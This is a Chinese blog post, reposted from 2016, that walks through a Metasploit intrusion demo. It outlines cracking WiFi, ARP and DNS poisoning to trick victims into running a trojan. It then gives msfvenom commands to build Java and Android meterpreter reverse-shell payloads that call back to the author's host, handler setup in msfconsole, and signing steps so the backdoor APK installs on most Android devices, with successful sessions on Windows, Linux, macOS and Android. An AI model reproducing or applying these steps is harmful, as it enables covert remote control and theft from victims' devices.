美文网首页
msf 直接控制大多数设备

msf 直接控制大多数设备

作者: KID_SAMA | 来源:发表于2019-01-17 16:05 被阅读0次

    这是我2016年写的一个博客,记录了一个入侵demo,原来的博客快支撑不下去了,现在转移到这来,以后还可以捡起来...以前的博客还是很稚嫩啊...

    注:获取目的主机的IP以及诱使目的主机下载并运行木马可以通过局域网的监听和毒化操作实现
    (2019/1/7添加:)大致流程:
    1.入侵进入局域网:利用Kali 中的WiFi破解工具,稳稳当当
    2.监听局域网数据流:利用arproof或ettercap或wireshark可以实现
    3.劫持流量&arp毒化:利用2中的工具即可实现
    4.dns毒化&搭建fake web:利用ettercap和setool可以实现
    5.替换对方数据流:利用ettercap可以实现
    6.等待对方运行:自己等吧

    metasploit不愧为一大自动化渗透神器。各个平台的渗透轻松应对,现在除了iphone我还不会,其他的大多数平台我已经来去自如了。利用java的跨平台特性同一个payload可以直接拿下大量shell !
    It's Show Time!

    首先打开Kali Linux

    Kali IP
    msfvenom --payload="java/meterpreter/reverse_tcp" LHOST=192.168.1.107 LPORT=4444 -t jar > jar_test.jar
    
    # 使用的payload 是 `java/meterpreter/reverse_tcp`
    
    # 生成的jar包直接用 `java -jar XXXX.jar` 来运行
    

    打开msfconsole

    msfconsole
    
    use exploit/multi/handler 
    
    set payload java/meterpreter/reverse_tcp 
    
    set LHOST 192.168.1.107
    
    set LPORT 4444 
    
    exploit -j -z
    
    # 然后就等着鱼儿上钩吧 ^_^ 使用 sessions -i 来查看上钩的鱼儿
    

    首先演示 Windows 8.1 上钩效果

    运行

    win8 运行

    上钩


    Win8.1 上钩

    接着是linux

    我就用kali linux 本身来测试了

    Kali 运行 Kali 上钩

    然后是我日思夜想的Mac OS X

    Mac OS 10.10 运行 Mac OS 10.10 上钩

    哇咔咔!!三大平台已经干掉了,就剩移动端了,

    一般来说Mac电脑上会装上java的,所以这个payload 成功率很大,而linux自带java,有些电脑小白不会在windows中安装java,单数那也不怕,我的别的文章可以直接攻击windows,专门攻击windows的payload还是相当多的,免杀也可以做起来。

    iphone咱先放放,我还不会,安卓就是小case了。

    安卓的涉及签名什么的,比较麻烦,耐心看下去......
    首先生成一个后门apk_test.apk

    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4444 R > apk_test.apk
    

    首先使用密钥工具创建密钥库

    keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
    
    生成密钥库

    然后使用JARsigner签名apk

    jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore apk_test.apk aliasname
    

    再用JARsigner验证签名

    jarsigner -verify -verbose -certs apk_test.apk
    
    验证签名

    一般Kali 没有安装Zipalign

    apt-get install zipalign
    

    然后用zipalign来验证apk

    zipalign -v 4 apk_test.apk new_test.apk
    
    最终生成

    这样我们就有了一个带有签名的apk,它可以安装在大多数安卓设备上了

    我安装在模拟器中

    payload安装

    然后打开msfconsole

    msfconsole
    
    use exploit/multi/handler
    
    set PAYLOAD android/meterpreter/reverse_tcp
    
    set LHOST 192.168.1.107
    
    set LPORT 4444
    
    exploit
    

    然后运行apk

    msf的结果是这样的

    安卓上钩

    OK!

    打完收工,目前msf只能应用于内网,要想应用到外网,要有外网IP和端口转发,这个以后再弄了(2019/1/7吐槽:后来根本就没弄),附上两个参考链接。

    msf Java 后门

    msf VS 安卓

    累炸,十二点半了。。。。我当时竟然十二点半就喊累了.....

    相关文章

      网友评论

          本文标题:msf 直接控制大多数设备

          本文链接:https://www.haomeiwen.com/subject/sxvidqtx.html